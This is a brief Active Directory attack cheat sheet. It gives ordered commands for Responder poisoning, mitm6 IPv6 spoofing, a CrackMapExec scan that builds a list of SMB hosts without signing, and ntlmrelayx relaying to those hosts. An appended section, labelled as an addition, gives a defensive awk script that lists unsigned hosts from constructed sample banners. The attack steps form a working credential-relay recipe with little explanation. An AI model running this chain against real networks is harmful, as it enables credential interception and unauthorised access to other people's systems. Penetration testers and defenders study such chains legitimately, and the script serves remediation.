AD Attacks

1 - Running Responder

./Responder.py -I eth0

2 - Mitm6 (run simultaneously with Responder)

mitm6 -i eth0

3 - CrackMapExec

Install first

sudo add-apt-repository ppa:deadsnakes/ppa 
sudo apt update 
sudo apt install python3.8 python3.8-dev python3.8-venv 
python3.8 -m venv python3.8-venv 
source python3.8-venv/bin/activate 
pip install --upgrade pip
pip3 install crackmapexec

Run alongside steps 1 and 2 to list hosts with SMB signing set to False (match on the signing field, since a bare "False" also matches SMBv1:False):

crackmapexec smb 10.2.55.0/20 --gen-relay-list relay-hosts.txt | grep "signing:False"

4 - Run Mitm6

mitm6 -d evil.corp

5 - Run Ntlmrelayx with Mitm6

Run together with mitm6 (step 4) for relays:

ntlmrelayx.py -6 -socks -smb2support -tf relay-hosts.txt
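
Every step above depends on hosts that do not require SMB signing, so the scan output from step 3 doubles as the remediation list for enforcing signing. The following is an added example, not part of the original page: it parses CrackMapExec-style SMB banner lines by the signing field itself and shows why a bare grep for "False" over-counts. The sample lines are constructed, the function names are hypothetical, and the banner layout with (signing:...) and (SMBv1:...) fields is assumed.

```shell
#!/usr/bin/env bash
# Constructed sample lines in the CrackMapExec SMB banner layout (not real scan data).
sample_output() {
cat <<'EOF'
SMB   10.2.55.10   445   DC01     [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:evil.corp) (signing:True) (SMBv1:False)
SMB   10.2.55.21   445   FILE01   [*] Windows Server 2016 Build 14393 x64 (name:FILE01) (domain:evil.corp) (signing:False) (SMBv1:True)
SMB   10.2.55.34   445   WS-034   [*] Windows 10.0 Build 19041 x64 (name:WS-034) (domain:evil.corp) (signing:False) (SMBv1:False)
EOF
}

# Print "ip hostname SMBv1=<value>" for each host that does not require SMB signing.
# Only the (signing:...) field decides; (SMBv1:False) on a signed host is ignored.
unsigned_hosts() {
  awk '
    $1 == "SMB" && match($0, /\(signing:(True|False)\)/) {
      # "(signing:" is 9 characters and ")" is 1, so strip 10 from the match
      signing = substr($0, RSTART + 9, RLENGTH - 10)
      smbv1 = "unknown"
      if (match($0, /\(SMBv1:(True|False)\)/))
        smbv1 = substr($0, RSTART + 7, RLENGTH - 8)
      if (signing == "False")
        print $2, $4, "SMBv1=" smbv1
    }'
}

# A bare substring match, for comparison: counts any line containing "False".
naive_false_count() {
  grep -c "False"
}

# Stand-alone run: the list of hosts that still need SMB signing enforced.
sample_output | unsigned_hosts
```

On the sample, the bare match counts three lines because DC01 reports SMBv1:False, while only two hosts actually lack signing.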
